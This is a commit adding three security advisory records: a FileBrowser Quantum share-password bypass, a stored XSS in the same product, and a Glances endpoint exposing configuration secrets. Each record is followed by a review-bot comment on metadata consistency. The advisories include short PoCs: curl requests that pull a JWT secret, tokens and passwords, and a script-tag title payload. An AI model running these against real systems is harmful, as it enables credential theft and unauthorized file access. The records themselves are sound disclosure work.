Commit 33d0368

1 parent 4d83c8a commit 33d0368

3 files changed

Lines changed: 197 additions & 0 deletions


Lines changed: 67 additions & 0 deletions
@@ -0,0 +1,67 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-525j-95gf-766f",
4+
"modified": "2026-03-09T19:48:12Z",
5+
"published": "2026-03-09T19:48:12Z",
6+
"aliases": [
7+
"CVE-2026-30933"
8+
],
9+
"summary": "FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info",
10+
"details": "### Summary\nThe remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2. \n\n\n### Details\nThe issue stems from two flaws:\n1. Tokenized download URLs are written into the persistent share model\n```\nbackend/http/share.go\nconvertToFrontendShareResponse(line 63)\ns.DownloadURL = getShareURL(r, s.Hash, true, s.Token)\n```\n2. The public endpoint:\n```\nGET /public/api/share/info\nreturns shareLink.CommonShare without clearing DownloadURL.\n```\n\nSince Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.\n\nThe previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL\n\n\n### PoC\n1. Create a password protected share as an authenticated user \n\n2. Copy the public share URL (the clipboard WITHOUT an arrow) \n `http://yourdomain/public/share/yoursharedhash` \n Example: \n `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw` \n\n3. 
Query the public share endpoint via curl request: \n`curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*' ` \nExample: \n`curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*' ` \n \n Response includes:\n ```\n {\n \"shareTheme\": \"default\",\n \"title\": \"Shared files - test.md\",\n \"description\": \"A share has been sent to you to view or download.\",\n \"disableSidebar\": false,\n \"downloadURL\": \"http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D\",\n \"shareURL\": \"http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw\",\n \"enforceDarkLightMode\": \"default\",\n \"viewMode\": \"normal\",\n \"shareType\": \"normal\",\n \"sidebarLinks\": [\n {\n \"name\": \"Share QR Code and Info\",\n \"category\": \"shareInfo\",\n \"target\": \"#\",\n \"icon\": \"qr_code\"\n },\n {\n \"name\": \"Download\",\n \"category\": \"download\",\n \"target\": \"#\",\n \"icon\": \"download\"\n },\n {\n \"name\": \"sourceLocation\",\n \"category\": \"custom\",\n \"target\": \"/srv/test.md\",\n \"icon\": \"\"\n }\n ],\n \"hasPassword\": true,\n \"disableLoginOption\": false,\n \"sourceURL\": \"/srv/test.md\"\n }\n ```\nNote the response \"hasPassword\": true and downloadURL includes token= parameter\n\n\n4. 
Take the downloadURL(seen in json data response) and replace \\u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering \nExample:\n`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`\n\nBrowser downloads file immediately without requiring password\n\n### Impact \nAn unauthenticated attacker can retrieve password protected shared files without the password.\nResults in authentication bypass, unauthorized file access and confidentiality compromise\n\n### Recommended Remediation\nSanitize DownloadURL in public share info responses via `commonShare.DownloadURL = \"\"` before returning the json response in shareInfoHandler method located in backend/share.go\n\nStructural fix, only generate tokenized URLs after successful password validation",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/gtsteffaniak/filebrowser/backend"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.0.0-20260307130210-09713b32a5f6"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-525j-95gf-766f"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/gtsteffaniak/filebrowser"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-200",
59+
"CWE-306",
60+
"CWE-602"
61+
],
62+
"severity": "HIGH",
63+
"github_reviewed": true,
64+
"github_reviewed_at": "2026-03-09T19:48:12Z",
65+
"nvd_published_at": null
66+
}
67+
}
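Review bot: the module path in `affected[0].package.name`, `github.com/gtsteffaniak/filebrowser/backend`, disagrees with the sibling advisory GHSA-r633-fcgp-m532 added in this same commit, which records the identical `fixed` pseudo-version `0.0.0-20260307130210-09713b32a5f6` against `github.com/gtsteffaniak/filebrowser`; OSV-based scanners match on the exact module path, so whichever of the two does not equal the real go.mod module path will never match and should be corrected. The `details` text is also inconsistent about the file to patch: the Details section cites `backend/http/share.go` while Recommended Remediation says `backend/share.go`. Since `references` lists only the advisory, the repository and two release tags, adding the fix commit that the pseudo-version encodes as a `WEB` reference would let readers verify the remediation.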
Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-gh4x-f7cq-wwx6",
4+
"modified": "2026-03-09T19:50:00Z",
5+
"published": "2026-03-09T19:50:00Z",
6+
"aliases": [
7+
"CVE-2026-30928"
8+
],
9+
"summary": "Glances Exposes Unauthenticated Configuration Secrets",
10+
"details": "### Summary\nThe /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords.\n\n### Details\nRoot Cause: The as_dict() method in config.py iterates over every section and every key in the ConfigParser and returns them all as a flat dictionary. No sensitive key filtering or redaction is applied.\n\nAffected Code:\n- _File: glances/outputs/glances_restful_api.py, lines 1154-1167_\n```\ndef _api_config(self):\n \"\"\"Glances API RESTful implementation.\n\n Return the JSON representation of the Glances configuration file\n HTTP/200 if OK\n HTTP/404 if others error\n \"\"\"\n try:\n # Get the RAW value of the config' dict\n args_json = self.config.as_dict() # <-- Returns ALL config including secrets\n except Exception as e:\n raise HTTPException(status.HTTP_404_NOT_FOUND, f\"Cannot get config ({str(e)})\")\n else:\n return GlancesJSONResponse(args_json)\n```\n\n- _File: glances/config.py, lines 280-287_\n```\ndef as_dict(self):\n \"\"\"Return the configuration as a dict\"\"\"\n dictionary = {}\n for section in self.parser.sections():\n dictionary[section] = {}\n for option in self.parser.options(section):\n dictionary[section][option] = self.parser.get(section, option) # No filtering\n return dictionary\n```\n- _File: glances/outputs/glances_restful_api.py, lines 472-475 (authentication bypass)_\n```\nif self.args.password:\n router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])\nelse:\n router = APIRouter(prefix=self.url_prefix) # No authentication!\n```\n### PoC\n- Start Glances in default webserver mode:\n```\nglances -w\n# Glances web server started on http://0.0.0.0:61208/\n```\n- From any network-reachable host, retrieve all configuration secrets:\n```\n# 
Get entire config including all credentials\ncurl http://target:61208/api/4/config\n```\nStep 3: Extract specific secrets:\n```\n# Get JWT secret key for token forgery\ncurl http://target:61208/api/4/config/outputs/jwt_secret_key\n\n# Get InfluxDB token\ncurl http://target:61208/api/4/config/influxdb2/token\n\n# Get all stored server passwords\ncurl http://target:61208/api/4/config/passwords\n```\n### Impact\nFull Infrastructure Compromise: Database credentials (InfluxDB, MongoDB, PostgreSQL/TimescaleDB, CouchDB, Cassandra) allow direct access to all connected backend data stores.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "glances"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.5.1"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-gh4x-f7cq-wwx6"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/nicolargo/glances/commit/306a7136154ba5c1531489c99f8306d84eae37da"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/nicolargo/glances"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.1"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-200"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-03-09T19:50:00Z",
63+
"nvd_published_at": null
64+
}
65+
}
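Review bot: `database_specific.cwe_ids` lists only CWE-200, yet the `details` section explicitly labels the `router = APIRouter(prefix=self.url_prefix)` branch (no `Depends(self.authentication)` when `self.args.password` is unset) as an authentication bypass; CWE-306, which the FileBrowser record in this same commit already uses, should be added so the entry reflects both the missing redaction in `as_dict()` and the unauthenticated router. The CVSS 4.0 vector also scores subsequent-system impact as `SC:N/SI:N/SA:N` while the Impact text claims full compromise of the connected InfluxDB, MongoDB, PostgreSQL/TimescaleDB, CouchDB and Cassandra stores through leaked credentials; either the vector or the impact statement should be reconciled. Minor: the PoC list switches from `- ` bullets to a `Step 3:` label mid-sequence.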
Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-r633-fcgp-m532",
4+
"modified": "2026-03-09T19:48:15Z",
5+
"published": "2026-03-09T19:48:15Z",
6+
"aliases": [
7+
"CVE-2026-30934"
8+
],
9+
"summary": "FileBrowser Quantum: Stored XSS in public share page via unsanitized share metadata (text/template misuse)",
10+
"details": "## Summary\nStored XSS is possible via share metadata fields (e.g., `title`, `description`) that are rendered into HTML for `/public/share/<hash>` without context-aware escaping. The server uses `text/template` instead of `html/template`, allowing injected scripts to execute when victims visit the share URL.\n\n## Details\nThe server renders `public/index.html` using `text/template` and injects user-controlled share fields (title/description/etc.) into HTML contexts. `text/template` does not perform HTML contextual escaping like `html/template`. Because share metadata is persistent, the payload becomes stored and executes whenever a victim opens the affected share page.\n\nRelevant code paths:\n- `backend/http/static.go` (template rendering and share metadata assignment)\n- `backend/http/httpRouter.go` (template initialization)\n- `frontend/public/index.html` (insertion points for title/description and related fields)\n\n## PoC\n1. Login as a user with share creation permission.\n2. Create a share (`POST /api/share`) with malicious metadata:\n - `title = </title><script>alert(\"xss\")</script><title>`\n3. Open the resulting `/public/share/<hash>` URL in a browser.\n4. **Expected:** Payload is safely escaped and displayed as text.\n5. **Actual:** JavaScript executes in victim's browser (stored XSS).\n\nTested on Docker image: `gtstef/filebrowser:stable` (version `v1.2.1-stable`).\n\n## Impact\n- Arbitrary script execution in application origin.\n- Potential account/session compromise, CSRF-like action execution, data exfiltration from authenticated contexts.\n- Affects anyone (including unauthenticated visitors) opening the malicious share URL.\n- The XSS is stored and persistent — no social engineering beyond sharing the link is required.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/gtsteffaniak/filebrowser"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.0.0-20260307130210-09713b32a5f6"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-r633-fcgp-m532"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/gtsteffaniak/filebrowser"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-79"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-03-09T19:48:15Z",
63+
"nvd_published_at": null
64+
}
65+
}
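Review bot: `affected[0].package.name` is `github.com/gtsteffaniak/filebrowser` here but `github.com/gtsteffaniak/filebrowser/backend` in GHSA-525j-95gf-766f from this same commit, with the same `fixed` pseudo-version; the two records should agree on one module path. The `references` array holds only the advisory, the repository and the `v1.2.2-stable` and `v1.3.1-beta` tags; including the fix commit that `0.0.0-20260307130210-09713b32a5f6` points at, as the Glances record in this commit does with its commit URL, would make the `fixed` boundary verifiable. Note also that the `details` field reports testing on `v1.2.1-stable` while the PoC refers to `POST /api/share`; confirming the release tag is consistent with the affected range is worthwhile before publishing.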
